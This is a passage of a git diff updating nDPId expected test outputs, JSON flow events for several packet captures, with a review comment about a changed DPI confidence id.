9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 
02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1511102578109,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578109,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTrFpCAjRAddSQpCnArwHRDvEv6bzYWaHzaQBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMC
VoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":137,"packets-processed":137,"total-skipped-flows":0,"total-l4-payload-len":121086,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1511102594936} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 137/137 @@ -29,9 +29,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885944 bytes -~~ total memory freed........: 5885944 bytes -~~ total allocations/frees...: 118280/118280 +~~ total memory allocated....: 6019578 bytes +~~ total memory freed........: 6019578 bytes +~~ total allocations/frees...: 121042/121042 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 2279 chars diff --git a/test/results/z3950.pcapng.out b/test/results/z3950.pcapng.out index d28350e4f..e39d6a9f4 100644 --- a/test/results/z3950.pcapng.out +++ b/test/results/z3950.pcapng.out 
@@ -11,8 +11,8 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Z3950","breed":"Acceptable","category":"Network"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-payload-len":4562,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1625070200217} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881859 bytes -~~ total memory freed........: 5881859 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6009132 bytes +~~ total memory freed........: 6009132 bytes +~~ total allocations/frees...: 120913/120913 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 819 chars diff --git a/test/results/zabbix.pcap.out b/test/results/zabbix.pcap.out index 28868312b..c12afac1b 100644 --- a/test/results/zabbix.pcap.out +++ b/test/results/zabbix.pcap.out 
@@ -4,8 +4,8 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":39,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1572254070614} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 685 chars diff --git a/test/results/zattoo.pcap.out b/test/results/zattoo.pcap.out index 3eff9bb52..ccd357bba 100644 
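Review bot: The numeric key inside `ndpi.confidence` changes from `"4"` to `"6"` on the `detected` and `end` records of this hunk while the label stays `"DPI"`, and the commit subject mentions only the libnDPI bump; the same renumbering appears in the zattoo.pcap.out, zcash.pcap.out and zoom.pcap.out hunks. Presumably the bumped libnDPI added confidence levels ahead of DPI, though that is not visible in this diff. A downstream consumer or alerting rule that filters flows on the numeric id would, without any error, stop matching DPI-confirmed detections or start matching whatever level now holds id 4. I would add a line to the commit description such as `ndpi.confidence id for "DPI" changes from 4 to 6; consumers should match on the name, not the id`, and repeat it wherever the event schema is documented.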
--- a/test/results/zattoo.pcap.out +++ b/test/results/zattoo.pcap.out 
@@ -4,15 +4,15 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS 
(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} 
